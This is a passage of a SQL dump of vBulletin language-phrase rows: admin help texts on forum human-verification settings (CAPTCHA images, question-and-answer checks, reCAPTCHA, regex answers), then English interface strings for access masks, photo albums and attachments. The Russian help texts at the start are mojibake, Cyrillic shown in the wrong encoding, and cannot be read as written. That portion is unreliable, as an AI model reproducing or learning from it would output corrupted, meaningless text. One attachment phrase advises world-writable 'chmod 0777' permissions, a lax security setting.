\r\nÃðè ïðîâåðêå èçîáðà æåÃèåì áóäåò ñãåÃåðèðîâà Ãî èçîáðà æåÃèå, ñîäåðæà ùåå Ãà áîð èñêà æ¸ÃÃûõ ÷èñåë è ëà òèÃñêèõ áóêâ, êîòîðûå ïîëüçîâà òåëü äîëæåà ðà ñïîçÃà òü è îòïðà âèòü ñèñòåìå äëÿ ñðà âÃÃ¥Ãèÿ. Äëÿ ïîääåðæêè äà ÃÃîé ôóÃêöèè òðåáóåòñÿ ëèáî áèáëèîòåêà GD2, ëèáî ImageMagick. Ãòî êëà ññè÷åñêèé âà ðèà Ãò, êîòîðûé ïðèâû÷åà äëÿ áîëüøèÃñòâà ïîëüçîâà òåëåé. ÌèÃóñîì ÿâëÿåòñÿ òî, ÷òî ïîëüçîâà òåëè, çà áëîêèðîâà âøèå îòîáðà æåÃèå èçîáðà æåÃèé, ÃÃ¥ ñìîãóò ïðîéòè äà ÃÃóþ ïðîâåðêó.
\r\n\r\nÃðîâåðêà âîïðîñîì è îòâåòîì
\r\nÃðîâåðêà âîïðîñîì è îòâåòîì âûáèðà åò ñëó÷à éÃûé âîïðîñ èç ïðåäóñòà ÃîâëåÃÃîãî ñïèñêà è îæèäà åò îòâåòà , ñîîòâåòñòâóþùåãî ñïèñêó äîïóñòèìûõ îòâåòîâ Ãà êîÃêðåòÃûé âîïðîñ. Ãòî ïîçâîëÿåò çà äà òü ñïåöèôè÷åñêèå äëÿ âà øåãî ôîðóìà âîïðîñà , òåì ñà ìûì ïðåäîòâðà òèâ âîçìîæÃîñòü îáõîäà çà ùèòû, ïóò¸ì çÃà Ãèÿ òèïîâûõ âîïðîñîâ è îòâåòîâ äëÿ áîëüøîãî êîëè÷åñòâà ôîðóìîâ vBulletin. Ãîæà ëóéñòà , óñòà Ãà âëèâà éòå òîëüêî òå âîïðîñû, Ãà êîòîðûå ñìîæåò îòâåòèòü ëþáîé (äà æå Ãà ÷èÃà þùèé) ïîëüçîâà òåëü èÃòåðÃåòà .
\r\n\r\nÃðîâåðêà ñåðâèñîì reCAPTCHA™ \r\nÑåðâèñ reCAPCTHA™ ïðåäîñòà âëÿåò ñîáñòâåÃÃûé ñåðâèñ ïðîâåðêè èçîáðà æåÃèåì. Ãîëüçîâà òåëü äîëæåà áóäåò ââåñòè äâà ðà çìûòûõ ñëîâà . Äà ÃÃûé ñåðâèñ äà ¸ò âîçìîæÃîñòü ïðîñëóøà òü à óäèî ôðà ãìåÃò ñ ÃóæÃûì òåêñòîì.
', 'vbulletin', 'zCarot', 1205930139, '3.7.0 Release Candidate 1'),
(24913, -1, 'verify_intro_hv_type_title', 'cphelptext', 'Ãèáëèîòåêà îòäåëåÃèÿ ëþäåé îò ðîáîòîâ', 'vbulletin', 'zCarot', 1205929473, '3.7.0 Release Candidate 1'),
(24914, -1, 'verify_intro_regimagetype_text', 'cphelptext', 'Äëÿ ãåÃåðà öèè èçîáðà æåÃèé ôîðóìó òðåáóåòñÿ ñïåöèà ëüÃà ÿ áèáëèîòåêà äëÿ îáðà áîòêè èçîáðà æåÃèé. Ãà äà ÃÃûé ìîìåÃò vBulletin ïîääåðæèâà åò äâå áèáëèîòåêè: GD è ImageMagick.
\r\n\r\nÈç ýòèõ äâóõ, áîëåå ïðåäïî÷òèòåëüÃîé ÿâëÿåòñÿ ImageMagick, Ãî ÷òîáû èñïîëüçîâà òü åãî, âà ì ñëåäóåò óáåäèòüñÿ, ÷òî îà óñòà Ãîâëåà Ãà âà øåì ñåðâåðå (à ýòî áûâà åò âåñüìà ðåäêî).
\r\n\r\nÅñëè âû âèäèòå îáà âà ðèà Ãòà èçîáðà æåÃèé, ñîçäà ÃÃûå êà ê ñ ïîìîùüþ GD, òà ê è ñ ïîìîùüþ ImageMagick, òî âû ìîæåòå âûáðà òü îäÃó èç Ãèõ ñà ìîñòîÿòåëüÃî.
\r\n\r\nÅñëè âû ÃÃ¥ âèäèòå èçîáðà æåÃèÿ, ñîçäà ÃÃîãî ñ ïîìîùüþ ImageMagick, òî ýòî ìîæåò îçÃà ÷à òü îäÃî èç äâóõ: ëèáî ImageMagick ÃÃ¥ óñòà Ãîâëåà Ãà ñåðâåðå, ëèáî âû ââåëè ÃåâåðÃûé ïóòü ê èñïîëÃÿåìûì ôà éëà ì ImageMagick â âà øèõ Ãà ñòðîéêà õ èçîáðà æåÃèé .
', 'vbulletin', 'zCarot', 1208657709, '3.7.0 Release Candidate 4'),
(24915, -1, 'verify_intro_regimagetype_title', 'cphelptext', 'Ãèáëèîòåêà èçîáðà æåÃèé äëÿ ïðîâåðîê', 'vbulletin', 'zCarot', 1205930455, '3.7.0 Release Candidate 1'),
(24916, -1, 'verify_intro_regimageoption_text', 'cphelptext', 'Ôîðóì äà ¸ò âîçìîæÃîñòü óêà çà òü ñëîæÃîñòü ãåÃåðèðóåìûõ èçîáðà æåÃèé äëÿ ïðîâåðêè.
\r\n\r\n×åì áîëüøå îïöèé âû âûáåðèòå, òåì ñëîæÃåå áóäåò îòîáðà æà òüñÿ òåêñò Ãà èçîáðà æåÃèè. Ãòî óñëîæÃèò ðà áîòó äëÿ ðîáîòîâ, Ãî ïðè ýòîì ëþäÿì òîæå ïðèä¸òñÿ ñèëüÃåå ïðèñìà òðèâà òüñÿ ê èçîáðà æåÃèÿì. Åñòü âåðîÿòÃîñòü, ÷òî òåêñò âîîáùå áóäåò ÃåâîçìîæÃî ïðî÷åñòü.
\r\n\r\n×òîáû îïðåäåëèòü ïîäõîäÿùóþ ñëîæÃîñòü èçîáðà æåÃèé ïîýêñïåðèìåÃòèðóéòå ñ äà ÃÃûìè Ãà ñòðîéêà ìè, ïðîáóÿ ñà ìîñòîÿòåëüÃî ðà ñïîçÃà òü òåêñò.
\r\n\r\nÃîäñêà çêà : ïîñëå ñîõðà ÃÃ¥Ãèÿ èçìåÃÃ¥Ãèé ñòðà Ãèöà ïåðåçà ãðóçèòñÿ è ïðèìåð äëÿ ïà ðà ìåòðà \"Ãèáëèîòåêà èçîáðà æåÃèé äëÿ ïðîâåðîê\" îáÃîâèòñÿ, îòîáðà æà ÿ òåêñò ñ óêà çà ÃÃûìè âà ìè çäåñü óñëîâèÿìè.
', 'vbulletin', 'zCarot', 1205932621, '3.7.0 Release Candidate 1'),
(24917, -1, 'verify_intro_regimageoption_title', 'cphelptext', 'Îïöèè èçîáðà æåÃèé äëÿ ïðîâåðîê', 'vbulletin', 'zCarot', 1205932491, '3.7.0 Release Candidate 1'),
(24918, -1, 'verify_modifyanswer_answer_text', 'cphelptext', 'Îòâåò Ãà âîïðîñ, êîòîðûé áóäåò ñ÷èòà òüñÿ âåðÃûì. Îòâåò, äà ÃÃûé ïîëüçîâà òåëåì, äîëæåà ÒÎ×ÃÃŽ ñîâïà äà òü ñ óêà çà ÃÃûì âà ìè çäåñü, ïîýòîìó âû ìîæåòå â âîïðîñå ïîðåêîìåÃäîâà òü Ãà ïèñà òü îòâåò ïîëÃîñòüþ çà ãëà âÃûìè èëè, Ãà îáîðîò, ñòðî÷Ãûìè áóêâà ìè, ÷òîáû ÃÃ¥ áûëî ïðîáëåì ñ ðåãèñòðîì.', 'vbulletin', 'zCarot', 1192812015, '3.7.0 Beta 1'),
(24919, -1, 'verify_modifyanswer_answer_title', 'cphelptext', 'Îòâåò', 'vbulletin', 'zCarot', 1192812015, '3.7.0 Beta 1'),
(24920, -1, 'verify_modifyquestion_question_text', 'cphelptext', 'Äëÿ ïðîâåðêè ïîëüçîâà òåëÿ áóäåò çà äà à âîïðîñ, âûáðà ÃÃûé ñëó÷à éÃî èç ñïèñêà âîïðîñîâ, ïðåäóñòà ÃîâëåÃÃûõ âà ìè. Ãîëüçîâà òåëü äîëæåà îòâåòèòü Ãà âîïðîñ òà ê, ÷òîáû îòâåò òî÷Ãî ñîâïà äà ë ñ òåìè âà ðèà Ãòà ìè îòâåòà , êîòîðûå âû ïðèêðåïèòå ê ýòîìó âîïðîñó.  ñëó÷à å Ãåïðà âèëüÃîãî îòâåòà ïîëüçîâà òåëþ ïðåäëîæà ò îòâåòèòü çà Ãîâî, Ãî ïðè ýòîì áóäåò âûáðà à ñëó÷à éÃûì îáðà çîì Ãîâûé âîïðîñ.', 'vbulletin', 'zCarot', 1192811060, '3.7.0 Beta 1'),
(24921, -1, 'verify_modifyquestion_question_title', 'cphelptext', 'Âîïðîñ', 'vbulletin', 'zCarot', 1192811060, '3.7.0 Beta 1'),
(24922, -1, 'verify_modifyquestion_regex_text', 'cphelptext', 'Âû ìîæåòå óêà çà òü ðåãóëÿðÃîå âûðà æåÃèå, êîòîðîìó äîëæåà ñîîòâåòñòâîâà òü îòâåò.  ýòîì ñëó÷à å âû ìîæåòå ÃÃ¥ óêà çûâà òü îòâåòû Ãà âîïðîñ - ïîäîéä¸ò ëþáîé, êîòîðûé áóäåò ñîîòâåòñòâîâà òü ýòîìó ðåãóëÿðÃîìó âûðà æåÃèþ.\r\n \r\n(ÃÃ¥ Ãà ÷èÃà éòå è ÃÃ¥ çà êà Ã÷èâà éòå âûðà æåÃèå ýêðà Ãèðóþùèì ñèìâîëîì) \r\n \r\nÃðèìåðû: \r\n^[A-Z]+$ - òîëüêî ñèìâîëû A-Z \r\n^[A-Z ]+$ - òîëüêî ñèìâîëû A-Z è ïðîáåë \r\n^[A-Z0-9 ]+$ - çà ãëà âÃûå ëà òèÃñêèå áóêâû, öèôðû è ïðîáåë \r\n^[A-ZÀ-ߨ0-9 ]+$ - çà ãëà âÃûå ëà òèÃñêèå è êèðèëëè÷åñêèå áóêâû, öèôðû è ïðîáåë \r\n^[\\x20-\\x7E]+$ - ñèìâîëû ASCII îò 32 äî 127 \r\n \r\nÄëÿ ïîëó÷åÃèÿ áîëüøåé èÃôîðìà öèè î ðåãóëÿðÃûõ âûðà æåÃèÿõ èçó÷èòå äîêóìåÃòà öèþ Ãà PHP.net .', 'vbulletin', 'zCarot', 1192811889, '3.7.0 Beta 1'),
(24923, -1, 'verify_modifyquestion_regex_title', 'cphelptext', 'ÃåãóëÿðÃîå âûðà æåÃèå', 'vbulletin', 'zCarot', 1192811889, '3.7.0 Beta 1'),
(32389, -1, 'access_denied', 'accessmask', 'Access Denied', 'vbulletin', '', 0, ''),
(32390, -1, 'access_denied_x_users', 'accessmask', 'Access Denied: {1} User(s)', 'vbulletin', '', 0, ''),
(32391, -1, 'access_granted', 'accessmask', 'Access Granted', 'vbulletin', '', 0, ''),
(32392, -1, 'access_granted_x_users', 'accessmask', 'Access Granted: {1} User(s)', 'vbulletin', '', 0, ''),
(32393, -1, 'access_mask_manager', 'accessmask', 'Access Mask Manager', 'vbulletin', '', 0, ''),
(32394, -1, 'access_masks_quick_editor', 'accessmask', 'Access Masks Quick Editor', 'vbulletin', '', 0, ''),
(32395, -1, 'delete_all_access_masks', 'accessmask', 'Delete All Access Masks', 'vbulletin', '', 0, ''),
(32396, -1, 'display_all_users', 'accessmask', 'Display All Users', 'vbulletin', '', 0, ''),
(32397, -1, 'display_users', 'accessmask', 'Display Users', 'vbulletin', '', 0, ''),
(32398, -1, 'sort', 'accessmask', 'Sort', 'vbulletin', '', 0, ''),
(32399, -1, 'user_forum_access_for_x', 'accessmask', 'User Forum Access for {1}', 'vbulletin', '', 0, ''),
(32400, -1, 'add_album', 'album', 'Add Album', 'vbulletin', 'vBulletin Solutions', 1192531424, '3.7.0 Beta 1'),
(32401, -1, 'add_picture_to_groups', 'album', 'Add Picture to Groups', 'vbulletin', 'vBulletin Solutions', 1201002563, '3.7.0 Beta 5'),
(32402, -1, 'add_pictures', 'album', 'Add Pictures', 'vbulletin', 'vBulletin Solutions', 1195470092, '3.7.0 Beta 1'),
(32403, -1, 'add_pictures_to_a_group', 'album', 'Add Pictures to a Group', 'vbulletin', 'vBulletin Solutions', 1195493521, '3.7.0 Beta 1'),
(32404, -1, 'add_selected_pictures_to', 'album', 'Add selected pictures to', 'vbulletin', 'vBulletin Solutions', 1195493476, '3.7.0 Beta 1'),
(32405, -1, 'add_to_group', 'album', 'Add to Group', 'vbulletin', 'vBulletin Solutions', 1195493558, '3.7.0 Beta 1'),
(32406, -1, 'album', 'album', 'Album', 'vbulletin', 'vBulletin Solutions', 1192530723, '3.7.0 Beta 1'),
(32407, -1, 'album_pictures_used_profile_styling', 'album', 'This album has pictures used for profile styling. Removing the album or making it non-public will remove this styling!', 'vbulletin', 'vBulletin Solutions', 1193411773, '3.7.0 Beta 1'),
(32408, -1, 'album_title', 'album', 'Album Title', 'vbulletin', 'vBulletin Solutions', 1192533749, '3.7.0 Beta 1'),
(32409, -1, 'album_type', 'album', 'Album Type', 'vbulletin', 'vBulletin Solutions', 1198108111, '3.7.0 Beta 4'),
(32410, -1, 'approve_this_picture', 'album', 'Approve this picture', 'vbulletin', 'vBulletin Solutions', 1203554248, '3.7.0 Beta 6'),
(32411, -1, 'bb_code', 'album', 'BB Code', 'vbulletin', 'vBulletin Solutions', 1204135862, '3.7.0 Beta 6'),
(32412, -1, 'caption', 'album', 'Caption', 'vbulletin', 'vBulletin Solutions', 1192532629, '3.7.0 Beta 1'),
(32413, -1, 'click_here_add_album_upload_pictures', 'album', 'Click here to add an album and start uploading pictures!', 'vbulletin', 'vBulletin Solutions', 1192533965, '3.7.0 Beta 1'),
(32414, -1, 'click_here_to_upload_pictures', 'album', 'Click here to upload pictures!', 'vbulletin', 'vBulletin Solutions', 1192533884, '3.7.0 Beta 1'),
(32415, -1, 'create_new_album', 'album', 'Create New Album', 'vbulletin', 'vBulletin Solutions', 1217341454, '3.8.0 Alpha 1'),
(32416, -1, 'delete_album', 'album', 'Delete Album', 'vbulletin', 'vBulletin Solutions', 1192533522, '3.7.0 Beta 1'),
(32417, -1, 'delete_this_picture', 'album', 'Delete this picture', 'vbulletin', 'vBulletin Solutions', 1192532653, '3.7.0 Beta 1'),
(32418, -1, 'description', 'album', 'Description', 'vbulletin', 'vBulletin Solutions', 1192533599, '3.7.0 Beta 1'),
(32419, -1, 'edit_album', 'album', 'Edit Album', 'vbulletin', 'vBulletin Solutions', 1192531965, '3.7.0 Beta 1'),
(32420, -1, 'edit_picture', 'album', 'Edit Picture', 'vbulletin', 'vBulletin Solutions', 1192532499, '3.7.0 Beta 1'),
(32421, -1, 'edit_picture_comment', 'album', 'Edit Picture Comment', 'vbulletin', 'vBulletin Solutions', 1200331275, '3.7.0 Beta 4'),
(32422, -1, 'edit_pictures', 'album', 'Edit Pictures', 'vbulletin', 'vBulletin Solutions', 1192532034, '3.7.0 Beta 1'),
(32423, -1, 'first_picture', 'album', 'First Picture', 'vbulletin', 'vBulletin Solutions', 1192713017, '3.7.0 Beta 1'),
(32424, -1, 'groups', 'album', 'Groups', 'vbulletin', 'vBulletin Solutions', 1195493418, '3.7.0 Beta 1'),
(32425, -1, 'last_picture', 'album', 'Last Picture', 'vbulletin', 'vBulletin Solutions', 1192533689, '3.7.0 Beta 1'),
(32426, -1, 'leave_cover_unchanged', 'album', 'Leave cover unchanged', 'vbulletin', 'vBulletin Solutions', 1192532728, '3.7.0 Beta 1'),
(32427, -1, 'max_file_size_per_picture', 'album', 'Maximum File Size per Picture', 'vbulletin', 'vBulletin Solutions', 1192534262, '3.7.0 Beta 1'),
(32428, -1, 'max_picture_dimensions', 'album', 'Maximum Picture Dimensions', 'vbulletin', 'vBulletin Solutions', 1192534283, '3.7.0 Beta 1'),
(32429, -1, 'move_to_album', 'album', 'Move to album', 'vbulletin', 'vBulletin Solutions', 1215599625, '3.8.0 Alpha 1'),
(32430, -1, 'next_picture', 'album', 'Next Picture »', 'vbulletin', 'vBulletin Solutions', 1192712995, '3.7.0 Beta 1'),
(32431, -1, 'note_comment_may_be_visible_locations', 'album', '(Note: your comment may be visible in alternative locations)', 'vbulletin', 'vBulletin Solutions', 1209736511, '3.7.1'),
(32432, -1, 'only_report_inappropriate_pictures', 'album', 'Note : This is ONLY to be used to report inappropriate pictures.', 'vbulletin', 'vBulletin Solutions', 1196420463, '3.7.0 Beta 1'),
(32433, -1, 'overview', 'album', 'Overview', 'vbulletin', 'vBulletin Solutions', 1217239246, '3.8.0 Alpha 1'),
(32434, -1, 'picture', 'album', 'Picture', 'vbulletin', 'vBulletin Solutions', 1192530764, '3.7.0 Beta 1'),
(32435, -1, 'picture_added', 'album', 'Picture Added', 'vbulletin', 'vBulletin Solutions', 1192532546, '3.7.0 Beta 1'),
(32436, -1, 'picture_by', 'album', 'Picture By', 'vbulletin', 'vBulletin Solutions', 1195559251, '3.7.0 Beta 1'),
(32437, -1, 'picture_limits', 'album', 'Picture Limits', 'vbulletin', 'vBulletin Solutions', 1192534159, '3.7.0 Beta 1'),
(32438, -1, 'picture_moderated', 'album', 'Moderated', 'vbulletin', 'vBulletin Solutions', 1203642569, '3.7.0 Beta 6'),
(32439, -1, 'picture_moderation_enabled', 'album', 'Moderation EnabledYour pictures will not be visible until approved by a moderator. ', 'vbulletin', 'vBulletin Solutions', 1203550244, '3.7.0 Beta 6'),
(32440, -1, 'picture_url', 'album', 'Picture URL', 'vbulletin', 'vBulletin Solutions', 1204135852, '3.7.0 Beta 6'),
(32441, -1, 'picture_waiting_moderator_approval', 'album', 'Picture Waiting Moderator Approval', 'vbulletin', 'vBulletin Solutions', 1203641767, '3.7.0 Beta 6'),
(32442, -1, 'picture_x_of_y_from_album_z', 'album', 'Picture {1} of {2} from Album {3} ', 'vbulletin', 'vBulletin Solutions', 1192710080, '3.7.0 Beta 1'),
(32443, -1, 'pictured_used_profile_styling', 'album', 'This picture is used for profile styling', 'vbulletin', 'vBulletin Solutions', 1193411834, '3.7.0 Beta 1'),
(32444, -1, 'pictures', 'album', 'Pictures', 'vbulletin', 'vBulletin Solutions', 1192533645, '3.7.0 Beta 1'),
(32445, -1, 'pictures_automatically_resized_better_manually', 'album', 'Pictures will be automatically resized to fit within these constraints if possible. However, you may receive better results by doing it manually.', 'vbulletin', 'vBulletin Solutions', 1201613829, '3.7.0 Beta 5'),
(32446, -1, 'pictures_from_this_private_album', 'album', '(Pictures from this private album will be viewable to all group members)', 'vbulletin', 'vBulletin Solutions', 1198785753, '3.7.0 Beta 4'),
(32447, -1, 'pictures_remaining', 'album', 'Pictures Remaining', 'vbulletin', 'vBulletin Solutions', 1192534189, '3.7.0 Beta 1'),
(32448, -1, 'pictures_to_upload', 'album', 'Pictures to Upload', 'vbulletin', 'vBulletin Solutions', 1192534104, '3.7.0 Beta 1'),
(32449, -1, 'post_comment', 'album', 'Post Comment', 'vbulletin', 'vBulletin Solutions', 1200331342, '3.7.0 Beta 4'),
(32450, -1, 'post_new_picture_comment', 'album', 'Post New Picture Comment', 'vbulletin', 'vBulletin Solutions', 1200331294, '3.7.0 Beta 4'),
(32451, -1, 'previous_picture', 'album', '« Previous Picture', 'vbulletin', 'vBulletin Solutions', 1192712958, '3.7.0 Beta 1'),
(32452, -1, 'private_album_paren', 'album', '(Private Album)', 'vbulletin', 'vBulletin Solutions', 1198185391, '3.7.0 Beta 4'),
(32453, -1, 'private_only_visible_contacts_moderators', 'album', 'Private - Only visible to contacts and moderators', 'vbulletin', 'vBulletin Solutions', 1198107885, '3.7.0 Beta 4'),
(32454, -1, 'profile_album_paren', 'album', '(Profile Album)', 'vbulletin', 'vBulletin Solutions', 1198185409, '3.7.0 Beta 4'),
(32455, -1, 'profile_pictures_modify_profile_style', 'album', 'Profile - Pictures used to modify your profile style', 'vbulletin', 'vBulletin Solutions', 1198107956, '3.7.0 Beta 4'),
(32456, -1, 'public', 'album', 'Public', 'vbulletin', 'vBulletin Solutions', 1198108101, '3.7.0 Beta 4'),
(32457, -1, 'recently_updated_albums', 'album', 'Recently Updated Albums', 'vbulletin', 'vBulletin Solutions', 1217239179, '3.8.0 Alpha 1'),
(32458, -1, 'report_picture', 'album', 'Report Picture', 'vbulletin', 'vBulletin Solutions', 1196158776, '3.7.0 Beta 1'),
(32459, -1, 'report_picture_comment', 'album', 'Report Picture Comment', 'vbulletin', 'vBulletin Solutions', 1200332722, '3.7.0 Beta 4'),
(32460, -1, 'space_remaining', 'album', 'Space Remaining', 'vbulletin', 'vBulletin Solutions', 1192534204, '3.7.0 Beta 1'),
(32461, -1, 'this_album_has_no_pictures', 'album', 'This album does not have any pictures.', 'vbulletin', 'vBulletin Solutions', 1192533910, '3.7.0 Beta 1'),
(32462, -1, 'this_is_album_cover', 'album', 'This is the album cover', 'vbulletin', 'vBulletin Solutions', 1192532682, '3.7.0 Beta 1'),
(32463, -1, 'this_user_has_no_albums', 'album', 'This user does not have any albums to display.', 'vbulletin', 'vBulletin Solutions', 1192533987, '3.7.0 Beta 1'),
(32464, -1, 'to_delete_this_album', 'album', 'To delete this album, click this box and press the \'Delete Album\' button', 'vbulletin', 'vBulletin Solutions', 1192533552, '3.7.0 Beta 1'),
(32465, -1, 'unlimited', 'album', 'Unlimited', 'vbulletin', 'vBulletin Solutions', 1192531739, '3.7.0 Beta 1'),
(32466, -1, 'upload_pictures', 'album', 'Upload Pictures', 'vbulletin', 'vBulletin Solutions', 1192531767, '3.7.0 Beta 1'),
(32467, -1, 'view_picture', 'album', 'View Picture', 'vbulletin', 'vBulletin Solutions', 1192706392, '3.7.0 Beta 1'),
(32468, -1, 'view_pictures', 'album', 'View Pictures', 'vbulletin', 'vBulletin Solutions', 1195470147, '3.7.0 Beta 1'),
(32469, -1, 'x_by_y_pixels', 'album', '{1} by {2} Pixels', 'vbulletin', 'vBulletin Solutions', 1192534408, '3.7.0 Beta 1'),
(32470, -1, 'x_unread', 'album', '{1} unread', 'vbulletin', 'vBulletin Solutions', 1200331418, '3.7.0 Beta 4'),
(32471, -1, 'xs_album_y', 'album', '{1}\'s Album: {2}', 'vbulletin', 'vBulletin Solutions', 1192532313, '3.7.0 Beta 1'),
(32472, -1, 'xs_albums', 'album', '{1}\'s Albums', 'vbulletin', 'vBulletin Solutions', 1192531196, '3.7.0 Beta 1'),
(32473, -1, 'add_a_single_avatar', 'attachment_image', 'Add a Single Avatar', 'vbulletin', '', 0, ''),
(32474, -1, 'add_a_single_post_icon', 'attachment_image', 'Add a Single Post Icon', 'vbulletin', '', 0, ''),
(32475, -1, 'add_a_single_smilie', 'attachment_image', 'Add a Single Smilie', 'vbulletin', '', 0, ''),
(32476, -1, 'add_avatar', 'attachment_image', 'Add Avatar', 'vbulletin', '', 0, ''),
(32477, -1, 'add_avatars', 'attachment_image', 'Add Avatars', 'vbulletin', '', 0, ''),
(32478, -1, 'add_multiple_avatars', 'attachment_image', 'Add Multiple Avatars', 'vbulletin', '', 0, ''),
(32479, -1, 'add_multiple_post_icons', 'attachment_image', 'Add Multiple Post Icons', 'vbulletin', '', 0, ''),
(32480, -1, 'add_multiple_smilies', 'attachment_image', 'Add Multiple Smilies', 'vbulletin', '', 0, ''),
(32481, -1, 'add_new_attachment_type', 'attachment_image', 'Add New Attachment Type', 'vbulletin', '', 0, ''),
(32482, -1, 'add_new_avatar_category', 'attachment_image', 'Add New Avatar Category', 'vbulletin', '', 0, ''),
(32483, -1, 'add_new_extension', 'attachment_image', 'Add New Extension', 'vbulletin', '', 0, ''),
(32484, -1, 'add_new_post_icon_category', 'attachment_image', 'Add New Post Icon Category', 'vbulletin', '', 0, ''),
(32485, -1, 'add_new_smilie_category', 'attachment_image', 'Add New Smilie Category', 'vbulletin', '', 0, ''),
(32486, -1, 'add_post_icon', 'attachment_image', 'Add Post Icon', 'vbulletin', '', 0, ''),
(32487, -1, 'add_post_icons', 'attachment_image', 'Add Post Icons', 'vbulletin', '', 0, ''),
(32488, -1, 'add_smilie', 'attachment_image', 'Add Smilie', 'vbulletin', '', 0, ''),
(32489, -1, 'add_smilies', 'attachment_image', 'Add Smilies', 'vbulletin', '', 0, ''),
(32490, -1, 'adding_multiple_avatars_reading_from_x', 'attachment_image', 'Adding Multiple Avatars Reading from {1}', 'vbulletin', '', 0, ''),
(32491, -1, 'adding_multiple_post_icons_reading_from_x', 'attachment_image', 'Adding Multiple Post Icons Reading from {1}', 'vbulletin', '', 0, ''),
(32492, -1, 'adding_multiple_smilies_reading_from_x', 'attachment_image', 'Adding Multiple Smilies Reading from {1}', 'vbulletin', '', 0, ''),
(32493, -1, 'album_picture_manager', 'attachment_image', 'Album Picture Manager', 'vbulletin', 'vBulletin Solutions', 1192539113, '3.7.0 Beta 1'),
(32494, -1, 'album_pictures', 'attachment_image', 'Album Pictures', 'vbulletin', 'vBulletin Solutions', 1192538438, '3.7.0 Beta 1'),
(32495, -1, 'album_pictures_currently_file_system_with_thumb', 'attachment_image', 'Album pictures are currently being stored in the file system with direct access to thumbnails', 'vbulletin', 'vBulletin Solutions', 1192539984, '3.7.0 Beta 1'),
(32496, -1, 'album_pictures_currently_file_system_without_thumb', 'attachment_image', 'Album pictures are currently being stored in the file system without direct access to thumbnails', 'vbulletin', 'vBulletin Solutions', 1192540007, '3.7.0 Beta 1'),
(32497, -1, 'album_pictures_currently_in_database', 'attachment_image', 'Album pictures are currently being stored in the database', 'vbulletin', 'vBulletin Solutions', 1192539798, '3.7.0 Beta 1'),
(32498, -1, 'are_you_sure_want_to_delete_avatar_x', 'attachment_image', 'Are you sure you want to delete the avatar called \'{1}\'?({2}: {3}) {4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'),
(32499, -1, 'are_you_sure_want_to_delete_post_icon_x', 'attachment_image', 'Are you sure you want to delete the post icon called \'{1}\'?({2}: {3}) {4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'),
(32500, -1, 'are_you_sure_want_to_delete_smilie_x', 'attachment_image', 'Are you sure you want to delete the smilie called \'{1}\'?({2}: {3}) {4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'),
(32501, -1, 'are_you_sure_you_want_to_delete_the_attachment_type_x', 'attachment_image', 'Are you sure you want to delete the attachment type: \'{1}\'?', 'vbulletin', '', 0, ''),
(32502, -1, 'are_you_sure_you_want_to_delete_the_attachment_x', 'attachment_image', 'Are you sure you want to delete the attachment: \'{1}\'?', 'vbulletin', '', 0, ''),
(32503, -1, 'are_you_sure_you_want_to_delete_the_avatar_category_called_x', 'attachment_image', 'Are you sure you want to delete the avatar category called: \'{1}\'?\r\n \r\nDelete all Avatars from this category? Yes No If you do not want to delete all Avatars from this category, they will all be moved to the category selected below. Destination Category: \\n{2}\\t\\t ', 'vbulletin', '', 0, ''),
(32504, -1, 'are_you_sure_you_want_to_delete_the_post_icon_category_called_x', 'attachment_image', 'Are you sure you want to delete the post icon category called: \'{1}\'? Delete all Post Icons from this category? Yes No If you do not want to delete all Post Icons from this category, they will all be moved to the category selected below. Destination Category: \\n{2}\\t\\t ', 'vbulletin', '', 0, ''),
(32505, -1, 'are_you_sure_you_want_to_delete_the_smilie_category_called_x', 'attachment_image', 'Are you sure you want to delete the Smilie category called: \'{1}\'? Delete all Smilies from this category? Yes No If you do not want to delete all Smilies from this category, they will all be moved to the category selected below. Destination Category: \\n{2}\\t\\t ', 'vbulletin', '', 0, ''),
(32506, -1, 'are_you_sure_you_want_to_delete_these_attachments', 'attachment_image', 'Are you sure you want to delete these attachments?', 'vbulletin', '', 0, ''),
(32507, -1, 'attached_after', 'attachment_image', 'Attached After (yyyy-mm-dd hh:mm:ss) ', 'vbulletin', '', 0, ''),
(32508, -1, 'attached_before', 'attachment_image', 'Attached Before (yyyy-mm-dd hh:mm:ss) ', 'vbulletin', '', 0, ''),
(32509, -1, 'attached_by', 'attachment_image', 'Attached By (username) ', 'vbulletin', '', 0, ''),
(32510, -1, 'attachment_file_path_dfn', 'attachment_image', 'Attachment File PathThis file path should be readable AND writeable by your web server (usually chmod 0777) ', 'vbulletin', '', 0, ''),
(32511, -1, 'attachment_is_visible', 'attachment_image', 'Attachment is Visible', 'vbulletin', '', 0, ''),
(32512, -1, 'attachment_manager', 'attachment_image', 'Attachment Manager', 'vbulletin', '', 0, ''),
(32513, -1, 'attachment_permissions', 'attachment_image', 'Attachment Permissions', 'vbulletin', 'vBulletin Solutions', 1148069742, '3.6.0 Beta 1'),
(32514, -1, 'attachment_permissions_manager', 'attachment_image', 'Attachment Permissions Manager', 'vbulletin', 'vBulletin Solutions', 1220017052, '3.8.0 Alpha 1'),
(32515, -1, 'attachment_removal', 'attachment_image', 'We have completed moving attachments to the filesystem. Presently, the attachments still remain in the database and are being read from there. If you are sure that the process completed without incident, go ahead and select yes below to remove the attachments from the database. This step cannot be reversed and may take a few minutes depending on the size of your database. Please be patient. \r\nAttachments in Database: {1} \r\nTotal Attachments Processed: {2} \r\nThe above two values should be the same! \r\nNumber of Attachments that could not be created or are 0 bytes: {3} \r\nThe above value should be 0 ! Having 0 byte attachments is not uncommon so a few is nothing to worry about but if the number equals the number of attachments in the database then DO NOT FINALIZE this step or you will lose all of your attachments.', 'vbulletin', '', 0, ''),
(32516, -1, 'attachment_type', 'attachment_image', 'Attachment Type', 'vbulletin', '', 0, ''),
(32517, -1, 'attachmentid_start_at', 'attachment_image', 'Attachmentid to start at:Set this if you have partially completed a conversion. You should start at 0 to insure an error free transfer. ', 'vbulletin', '', 0, ''),
(32518, -1, 'attachments_are_currently_being_stored_in_the_database', 'attachment_image', 'Attachments are currently being stored in the database', 'vbulletin', '', 0, ''),
(32519, -1, 'attachments_are_currently_being_stored_in_the_filesystem_at_x', 'attachment_image', 'Attachments are currently being stored in the filesystem at {1}', 'vbulletin', '', 0, ''),
(32520, -1, 'attachments_to_show_per_page', 'attachment_image', 'Attachments to Show Per Page', 'vbulletin', '', 0, ''),
(32521, -1, 'avatar', 'attachment_image', 'Avatar', 'vbulletin', '', 0, ''),
(32522, -1, 'avatar_category', 'attachment_image', 'Avatar Category', 'vbulletin', '', 0, ''),
